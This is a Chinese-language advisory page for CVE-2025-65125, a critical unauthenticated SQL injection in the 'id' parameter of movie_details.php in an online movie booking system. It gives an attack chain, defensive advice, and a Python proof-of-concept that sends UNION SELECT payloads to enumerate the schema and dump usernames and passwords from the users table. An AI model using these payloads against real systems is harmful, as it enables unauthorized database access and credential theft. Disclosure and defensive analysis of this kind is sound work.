CVE-2025-65125 在线电影预订系统movie

漏洞信息

漏洞编号

CVE-2025-65125

漏洞类型

SQL注入

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

gosaliajainam/online-movie-booking

漏洞概述

CVE-2025-65125是 gosaliajainam/online-movie-booking 5.5版本中存在的一个严重SQL注入漏洞。该漏洞位于movie_details.php文件中，由于未对用户输入进行充分的过滤和参数化处理，攻击者可以通过构造恶意的SQL语句实现对数据库的非法访问。成功利用此漏洞，攻击者可以在无需任何认证的情况下获取数据库中的敏感信息，包括用户账户、密码哈希、订单记录、支付信息等机密数据。由于该漏洞的CVSS评分达到9.8分（满分10分），属于紧急严重级别，对使用该系统的企业或个人用户构成极高安全风险。建议受影响的用户立即采取修复措施，防止敏感数据泄露。

技术细节

该SQL注入漏洞存在于movie_details.php文件中，具体位置可能为电影ID参数或相关查询参数。攻击者可以通过在URL参数中注入SQL payloads来操纵原始SQL查询语句。典型的利用方式是在电影ID参数后添加UNION SELECT语句或布尔盲注payload来提取数据库内容。由于漏洞点位于电影详情查询功能，攻击者只需知道电影ID即可发动攻击，无需任何前置认证。漏洞的根本原因在于程序直接拼接用户输入到SQL查询语句中，缺少预编译语句（PreparedStatement）的使用和输入过滤机制。攻击者可以利用UNION注入提取数据库版本、当前用户、数据库名、表结构等敏感信息，进而获取完整的业务数据。

攻击链分析

STEP 1

步骤1

攻击者识别目标系统使用的在线电影预订系统版本为5.5

STEP 2

步骤2

访问movie_details.php文件，识别可注入的参数点（电影ID参数）

STEP 3

步骤3

构造恶意SQL payload注入到id参数中，如使用UNION SELECT语句

STEP 4

步骤4

通过UNION注入提取数据库版本、数据库名、表结构等元信息

STEP 5

步骤5

利用information_schema或盲注技术枚举数据库表和列

STEP 6

步骤6

提取users、orders等敏感表中的用户凭证、订单数据等机密信息

STEP 7

步骤7

利用获取的凭据进行后续横向移动或数据售卖

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# CVE-2025-65125 SQL Injection PoC
# Target: gosaliajainam/online-movie-booking v5.5
# File: movie_details.php

target_url = "http://target.com/movie_details.php"

# Basic SQL Injection test - extract database version
payload_db_version = "1' UNION SELECT NULL,version(),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -"
params = {"id": payload_db_version}
response = requests.get(target_url, params=params)

if "5." in response.text or "8." in response.text:
    print("[+] Database version detected - SQL Injection confirmed!")

# Extract database name
payload_db_name = "1' UNION SELECT NULL,database(),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -"
params["id"] = payload_db_name
response = requests.get(target_url, params=params)

# Extract tables
payload_tables = "1' UNION SELECT NULL,group_concat(table_name),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM information_schema.tables WHERE table_schema=database()-- -"
params["id"] = payload_tables
response = requests.get(target_url, params=params)

# Extract users table columns
payload_columns = "1' UNION SELECT NULL,group_concat(column_name),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM information_schema.columns WHERE table_name='users'-- -"
params["id"] = payload_columns
response = requests.get(target_url, params=params)

# Extract sensitive data
payload_data = "1' UNION SELECT NULL,group_concat(username,':',password),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM users-- -"
params["id"] = payload_data
response = requests.get(target_url, params=params)
print("[+] Extracted sensitive credentials")

影响范围

gosaliajainam/online-movie-booking 5.5

防御指南

临时缓解措施

立即停止使用受影响的在线电影预订系统，或在网络层限制对movie_details.php的直接访问。同时可临时使用WAF规则拦截包含SQL注入特征（如UNION、SELECT、--等关键字）的请求。建议尽快联系开发团队获取安全更新或自行修复SQL查询代码，将用户输入参数化处理。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-65125
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-65125
3 Details https://www.cvedetails.com/cve/CVE-2025-65125/
4 VulDB https://vuldb.com/cve/CVE-2025-65125
5 Link https://github.com/TheAnhaj/CVE-Researches

CVE-2025-65125 在线电影预订系统movie_details.php SQL注入漏洞